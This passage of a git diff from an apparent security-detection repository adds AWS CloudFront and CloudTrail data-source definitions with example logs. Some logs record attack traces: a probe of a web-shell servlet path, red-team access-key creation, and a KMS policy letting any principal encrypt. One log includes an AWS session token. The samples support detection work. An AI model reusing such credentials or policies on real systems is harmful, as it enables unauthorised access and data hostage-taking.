diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 57c9873004..13e95e8001 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -23,7 +23,7 @@ jobs:
       
       - name: Install Python Dependencies and ContentCTL and Atomic Red Team
         run: |
-          pip install contentctl==4.1.5
+          pip install contentctl==4.2.0
           git clone --depth=1 --single-branch --branch=master https://github.com/redcanaryco/atomic-red-team.git
       
       - name: Running build with enrichments
diff --git a/.github/workflows/unit-testing.yml b/.github/workflows/unit-testing.yml
index 1535f2d09e..4f51b0b1cb 100644
--- a/.github/workflows/unit-testing.yml
+++ b/.github/workflows/unit-testing.yml
@@ -24,7 +24,7 @@ jobs:
         - name: Install Python Dependencies and ContentCTL
           run: |
             python -m pip install --upgrade pip
-            pip install contentctl==4.1.5
+            pip install contentctl==4.2.0
            
         # Running contentctl test with a few arguments, before running the command make sure you checkout into the current branch of the pull request. This step only performs unit testing on all the changes against the target-branch. In most cases this target branch will be develop
         # Make sure we check out the PR, even if it actually lives in a fork
diff --git a/data_sources/application/PingID.yml b/data_sources/application/PingID.yml
deleted file mode 100644
index 5469e4b976..0000000000
--- a/data_sources/application/PingID.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-name: PingID
-id: 17890675-61c1-40bd-a88e-6a8e9e246b43
-author: Patrick Bareiss, Splunk
-source: XmlWinEventLog:Security
-sourcetype: XmlWinEventLog
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - actors{}.name
-  - actors{}.type
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - extracted_source
-  - host
-  - id
-  - index
-  - linecount
-  - punct
-  - recorded
-  - resources{}.ipaddress
-  - resources{}.websession
-  - result.message
-  - result.status
-  - source
-  - sourcetype
-  - splunk_server
-  - timeendpos
-  - timestartpos
-example_log:
-  '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
-  Paired SMS \"Mobile 1\""}}'
diff --git a/data_sources/application/Splunk.yml b/data_sources/application/Splunk.yml
deleted file mode 100644
index 15ff9ed068..0000000000
--- a/data_sources/application/Splunk.yml
+++ /dev/null
@@ -1,34 +0,0 @@
-name: Splunk
-id: d8a2c791-460b-4756-a8e5-ecade77b21e3
-author: Patrick Bareiss, Splunk
-source: splunkd_ui_access.log
-sourcetype: splunkd_ui_access
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - action
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - host
-  - index
-  - info
-  - linecount
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timeendpos
-  - timestamp
-  - timestartpos
-  - user
-example_log:
-  "Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
-  info=granted REST: /search/jobs/rt_1674684525.24/events]"
diff --git a/data_sources/aws_cloudfront.yml b/data_sources/aws_cloudfront.yml
new file mode 100644
index 0000000000..f97be5b2b4
--- /dev/null
+++ b/data_sources/aws_cloudfront.yml
@@ -0,0 +1,98 @@
+name: AWS Cloudfront
+id: 780086dc-2384-45b6-ade7-56cb00105464
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS Cloudfront
+source: aws
+sourcetype: aws:cloudfront:accesslogs
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- bytes
+- bytes_in
+- bytes_out
+- c_ip
+- c_port
+- cached
+- category
+- client_ip
+- cs_bytes
+- cs_cookie
+- cs_host
+- cs_method
+- cs_protocol
+- cs_protocol_version
+- cs_referer
+- cs_uri_query
+- cs_uri_stem
+- cs_user_agent
+- date
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- duration
+- edge_location_name
+- eventtype
+- fle_encrypted_fields
+- fle_status
+- host
+- http_content_type
+- http_method
+- http_user_agent
+- http_user_agent_length
+- index
+- linecount
+- punct
+- response_time
+- sc_bytes
+- sc_content_len
+- sc_content_type
+- sc_range_end
+- sc_range_start
+- sc_status
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_port
+- ssl_cipher
+- ssl_protocol
+- status
+- tag
+- tag::eventtype
+- time
+- time_taken
+- time_to_first_byte
+- timeendpos
+- timestartpos
+- uri_path
+- url
+- url_domain
+- url_length
+- vendor_product
+- x_edge_detail_result_type
+- x_edge_location
+- x_edge_request_id
+- x_edge_response_result_type
+- x_edge_result_type
+- x_forwarded_for
+- x_host_header
+example_log: "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
+  /plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
+  -\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
+  confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
+  LambdaGeneratedResponse\tHTTP/1.1\t-\t-\t57232\t0.276\tLambdaGeneratedResponse\t\
+  text/html\t527\t-\t-"
diff --git a/data_sources/aws_cloudtrail.yml b/data_sources/aws_cloudtrail.yml
new file mode 100644
index 0000000000..c22708e508
--- /dev/null
+++ b/data_sources/aws_cloudtrail.yml
@@ -0,0 +1,14 @@
+name: AWS CloudTrail
+id: e8ace6db-1dbd-4c72-a1fb-334684619a38
+version: 1
+date: '2024-07-24'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+
diff --git a/data_sources/aws_cloudtrail_assumerolewithsaml.yml b/data_sources/aws_cloudtrail_assumerolewithsaml.yml
new file mode 100644
index 0000000000..f18e90df40
--- /dev/null
+++ b/data_sources/aws_cloudtrail_assumerolewithsaml.yml
@@ -0,0 +1,126 @@
+name: AWS CloudTrail AssumeRoleWithSAML
+id: 1e28f2a6-2db9-405f-b298-18734a293f77
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail AssumeRoleWithSAML
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.durationSeconds
+- requestParameters.principalArn
+- requestParameters.roleArn
+- requestParameters.roleSessionName
+- requestParameters.sAMLAssertionID
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.assumedRoleUser.arn
+- responseElements.assumedRoleUser.assumedRoleId
+- responseElements.audience
+- responseElements.credentials.accessKeyId
+- responseElements.credentials.expiration
+- responseElements.credentials.sessionToken
+- responseElements.issuer
+- responseElements.nameQualifier
+- responseElements.subject
+- responseElements.subjectType
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user
+- src_user_id
+- src_user_type
+- start_time
+- status
+- tag
+- tag::action
+- tag::eventtype
+- temp_access_key
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.identityProvider
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- user_agent
+- user_arn
+- user_id
+- user_name
+- user_role
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "SAMLUser", "principalId":
+  "ZRu9MRAjiG9tvi1QBNfdI664G5A=:rodsoto@rodsoto.onmicrosoft.com", "userName": "rodsoto@rodsoto.onmicrosoft.com",
+  "identityProvider": "ZRu9MRAjiG9tvi1QBNfdI664G5A="}, "eventTime": "2021-01-22T03:44:16Z",
+  "eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML", "awsRegion":
+  "us-east-1", "sourceIPAddress": "72.21.217.152", "userAgent": "AWS Signin, aws-internal/3
+  aws-sdk-java/1.11.898 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01
+  java/1.8.0_275 kotlin/1.3.72 vendor/Oracle_Corporation", "requestParameters": {"sAMLAssertionID":
+  "_d33ba0ad-0c88-4b83-80a6-27c08027d000", "roleSessionName": "rodsoto@rodsoto.onmicrosoft.com",
+  "durationSeconds": 3600, "roleArn": "arn:aws:iam::111111111111:role/rodonmicrotestrole",
+  "principalArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements":
+  {"subjectType": "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress", "issuer":
+  "https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/", "credentials":
+  {"accessKeyId": "ASIAYTOGP2RLKJXOV7VR", "expiration": "Jan 22, 2021 3:59:16 AM",
+  "sessionToken": "IQoJb3JpZ2luX2VjENz//////////wEaCXVzLWVhc3QtMSJGMEQCIHl/WQdLq53ULYl10fPtpeV3H7da9mOXGuIStvhdDA6kAiAdO/7rocOXAtyDV+0MJhSj/piqlqEI/BcAKm8zqBhOgiqgAwi1//////////8BEAIaDDU5MTUxMTE0NzYwNiIMAFP8GfyI/x1fKCHYKvQCznxxgKnEdcuvrr/fBLmHxEDjQ9vQxjasA8gZF8GawZ5SFH9ViKqoZh93bYkOwKqZD8cdqJIo9SYL17RGhVqxzvsjU4+QsRXTN5eGgh+LyF9EZqeCl6oCkaTJqNrXHuenzTi0yiL510LKsSckrAm8+SuwI/jQu3oE1BEcJQieAc4RjYx3II+1cUvyfRlFvR2NDfZhdWcQvAivV06KJg9c2zfCF0Agzn/YZSNvsRL5UhnKhJ2wktSvT8lR0mS3n9xR1j3iYNxVDHab180cnfkP3G6tAmxj5U29diNQrusJxKWWhr/Q9wHRdDj5dO2QUZzSymKKU/UiRJ8nyYPINaJ8XWVAPiT4QgzpMxotkvSkDLEG/brB9yEr2p7W8Y3xMGZ37qSGkuU4z9x40RU9G1XPhv27NO9aaGs/VXYTMCzWRNxnsLfNkk/DihrcaR0SclRcvs+zmfe1ZUoGnfjNYm+AIyJi4D7OrXF5/Mt46Z2y76DnULlAMJCUqYAGOpsBw4fyafV8OizX7Lebh2JRXFZsWBY1GTpyGvO5otrw++4axud44vYVi5iU5rbJxtTBm4vtJartxgXoPJFnQuat9gLrIlXhjmg+m50a5xs1Ut2UWEsWY2Duu4jA9ap7P7dYv9kIK9P2uyhsjKQhCjTpfe4I/llcupbDotYBJuvlB5n85a5kgiSriFk5zetoXQIweuYEWQZsD/AN+LE="},
+  "nameQualifier": "ZRu9MRAjiG9tvi1QBNfdI664G5A=", "assumedRoleUser": {"assumedRoleId":
+  "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com"},
+  "subject": "rodsoto@rodsoto.onmicrosoft.com", "audience": "https://signin.aws.amazon.com/saml"},
+  "requestID": "e19c7a7f-cd96-4642-9ee6-2360a7b01b12", "eventID": "b25b825d-9c9b-49d3-9ecd-290dbe8f2c29",
+  "readOnly": true, "resources": [{"accountId": "111111111111", "type": "AWS::IAM::Role",
+  "ARN": "arn:aws:iam::111111111111:role/rodonmicrotestrole"}, {"accountId": "111111111111",
+  "type": "AWS::IAM::SAMLProvider", "ARN": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}],
+  "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+  "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_consolelogin.yml b/data_sources/aws_cloudtrail_consolelogin.yml
new file mode 100644
index 0000000000..76f955a0be
--- /dev/null
+++ b/data_sources/aws_cloudtrail_consolelogin.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail ConsoleLogin
+id: b68b3f26-bd21-4fa8-b593-616fe75ac0ae
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ConsoleLogin
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- additionalEventData.LoginTo
+- additionalEventData.MFAUsed
+- additionalEventData.MobileVersion
+- app
+- authentication_method
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestParameters
+- responseElements.ConsoleLogin
+- result
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.type
+- userIdentity.userName
+- user_access_key
+- user_agent
+- user_group_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "accountId":
+  "140429656527", "accessKeyId": "", "userName": "HIDDEN_DUE_TO_SECURITY_REASONS"},
+  "eventTime": "2022-10-19T20:33:38Z", "eventSource": "signin.amazonaws.com", "eventName":
+  "ConsoleLogin", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent":
+  "Go-http-client/1.1", "errorMessage": "No username found in supplied account", "requestParameters":
+  null, "responseElements": {"ConsoleLogin": "Failure"}, "additionalEventData": {"LoginTo":
+  "https://console.aws.amazon.com", "MobileVersion": "No", "MFAUsed": "No"}, "eventID":
+  "9fcfb8c3-3fca-48db-85d2-7b107f9d95d0", "readOnly": false, "eventType": "AwsConsoleSignIn",
+  "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "signin.aws.amazon.com"}}'
diff --git a/data_sources/aws_cloudtrail_copyobject.yml b/data_sources/aws_cloudtrail_copyobject.yml
new file mode 100644
index 0000000000..d523b69f1e
--- /dev/null
+++ b/data_sources/aws_cloudtrail_copyobject.yml
@@ -0,0 +1,119 @@
+name: AWS CloudTrail CopyObject
+id: 965083f4-64a8-403f-99cc-252e1a6bd3b6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CopyObject
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SSEApplied
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.bucketName
+- requestParameters.key
+- requestParameters.x-amz-copy-source
+- requestParameters.x-amz-server-side-encryption
+- requestParameters.x-amz-server-side-encryption-aws-kms-key-id
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.x-amz-server-side-encryption
+- responseElements.x-amz-server-side-encryption-aws-kms-key-id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"},
+  "eventTime": "2021-01-11T12:40:47Z", "eventSource": "s3.amazonaws.com", "eventName":
+  "CopyObject", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent":
+  "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3.cp]", "requestParameters":
+  {"bucketName": "patricktestbucketencrypt", "x-amz-server-side-encryption-aws-kms-key-id":
+  "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "Host":
+  "patricktestbucketencrypt.s3.us-west-2.amazonaws.com", "x-amz-server-side-encryption":
+  "aws:kms", "x-amz-copy-source": "patricktestbucketencrypt/kms_aws_events.json",
+  "key": "kms_aws_events_encrypted.json"}, "responseElements": {"x-amz-server-side-encryption":
+  "aws:kms", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"},
+  "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "bytesTransferredIn": 0.0, "SSEApplied": "SSE_KMS", "AuthenticationMethod": "AuthHeader",
+  "x-amz-id-2": "fqzX1iZV6ImDtkFxbGvziOE6fUwryRa+PhnLckfVAkLNHdbCAHNq4l/yckUd1a2HNJPL6NAS01U=",
+  "bytesTransferredOut": 234.0}, "requestID": "6A7359F7A9414B02", "eventID": "b20d43de-175d-4443-acd7-f5f3e587ae00",
+  "readOnly": false, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events_encrypted.json"},
+  {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"},
+  {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"},
+  {"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events.json"}],
+  "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111",
+  "eventCategory": "Data"}'
diff --git a/data_sources/aws_cloudtrail_createaccesskey.yml b/data_sources/aws_cloudtrail_createaccesskey.yml
new file mode 100644
index 0000000000..2585e83466
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createaccesskey.yml
@@ -0,0 +1,103 @@
+name: AWS CloudTrail CreateAccessKey
+id: 0460f7da-3254-4d90-b8c0-2ca657d0cea0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateAccessKey
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.userName
+- responseElements.accessKey.accessKeyId
+- responseElements.accessKey.createDate
+- responseElements.accessKey.status
+- responseElements.accessKey.userName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_user_name
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121521347698:user/bhavin_cli", "accountId":
+  "121521347698", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+  "eventTime": "2021-03-02T21:18:24Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "CreateAccessKey", "awsRegion": "us-east-1", "sourceIPAddress": "12.25.72.12", "userAgent":
+  "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-access-key",
+  "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": {"accessKey":
+  {"userName": "AtomicRedTeam", "accessKeyId": "AKIAYTOGP2RLOQ4ULYGT", "status": "Active",
+  "createDate": "Mar 2, 2021 9:18:24 PM"}}, "requestID": "12c8773d-6c78-46bf-a8e4-f841adc8f70d",
+  "eventID": "5772e8d5-cccc-470d-81ef-acacfe85a804", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+  "121521347698"}'
diff --git a/data_sources/aws_cloudtrail_createkey.yml b/data_sources/aws_cloudtrail_createkey.yml
new file mode 100644
index 0000000000..5279b10239
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createkey.yml
@@ -0,0 +1,150 @@
+name: AWS CloudTrail CreateKey
+id: fcfc1593-b6b5-4a0f-91c5-3c395116a8b9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateKey
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.bypassPolicyLockoutSafetyCheck
+- requestParameters.customerMasterKeySpec
+- requestParameters.description
+- requestParameters.keyUsage
+- requestParameters.origin
+- requestParameters.policy
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements.keyMetadata.aWSAccountId
+- responseElements.keyMetadata.arn
+- responseElements.keyMetadata.creationDate
+- responseElements.keyMetadata.customerMasterKeySpec
+- responseElements.keyMetadata.description
+- responseElements.keyMetadata.enabled
+- responseElements.keyMetadata.encryptionAlgorithms{}
+- responseElements.keyMetadata.keyId
+- responseElements.keyMetadata.keyManager
+- responseElements.keyMetadata.keyState
+- responseElements.keyMetadata.keyUsage
+- responseElements.keyMetadata.origin
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+  "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+  "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T09:56:31Z",
+  "eventSource": "kms.amazonaws.com", "eventName": "CreateKey", "awsRegion": "us-west-2",
+  "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893
+  Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10
+  java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"origin": "AWS_KMS",
+  "policy": "{\n    \"Id\": \"key-consolepolicy-3\",\n    \"Version\": \"2012-10-17\",\n    \"Statement\":
+  [\n        {\n            \"Sid\": \"Enable IAM User Permissions\",\n            \"Effect\":
+  \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:root\"\n            },\n            \"Action\":
+  \"kms:*\",\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\":
+  \"Allow access for Key Administrators\",\n            \"Effect\": \"Allow\",\n            \"Principal\":
+  {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:Create*\",\n                \"kms:Describe*\",\n                \"kms:Enable*\",\n                \"kms:List*\",\n                \"kms:Put*\",\n                \"kms:Update*\",\n                \"kms:Revoke*\",\n                \"kms:Disable*\",\n                \"kms:Get*\",\n                \"kms:Delete*\",\n                \"kms:TagResource\",\n                \"kms:UntagResource\",\n                \"kms:ScheduleKeyDeletion\",\n                \"kms:CancelKeyDeletion\"\n            ],\n            \"Resource\":
+  \"*\"\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\":
+  \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:Encrypt\",\n                \"kms:Decrypt\",\n                \"kms:ReEncrypt*\",\n                \"kms:GenerateDataKey*\",\n                \"kms:DescribeKey\"\n            ],\n            \"Resource\":
+  \"*\"\n        },\n        {\n            \"Sid\": \"Allow attachment of persistent
+  resources\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\":
+  \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\":
+  [\n                \"kms:CreateGrant\",\n                \"kms:ListGrants\",\n                \"kms:RevokeGrant\"\n            ],\n            \"Resource\":
+  \"*\",\n            \"Condition\": {\n                \"Bool\": {\n                    \"kms:GrantIsForAWSResource\":
+  \"true\"\n                }\n            }\n        },\n        {\n            \"Sid\":
+  \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\":
+  {\n                \"AWS\": \"*\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\"\n            ],\n            \"Resource\":
+  \"*\"\n        }\n    ]\n}", "description": "", "customerMasterKeySpec": "SYMMETRIC_DEFAULT",
+  "bypassPolicyLockoutSafetyCheck": false, "tags": [], "keyUsage": "ENCRYPT_DECRYPT"},
+  "responseElements": {"keyMetadata": {"aWSAccountId": "111111111111", "keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1",
+  "arn": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1",
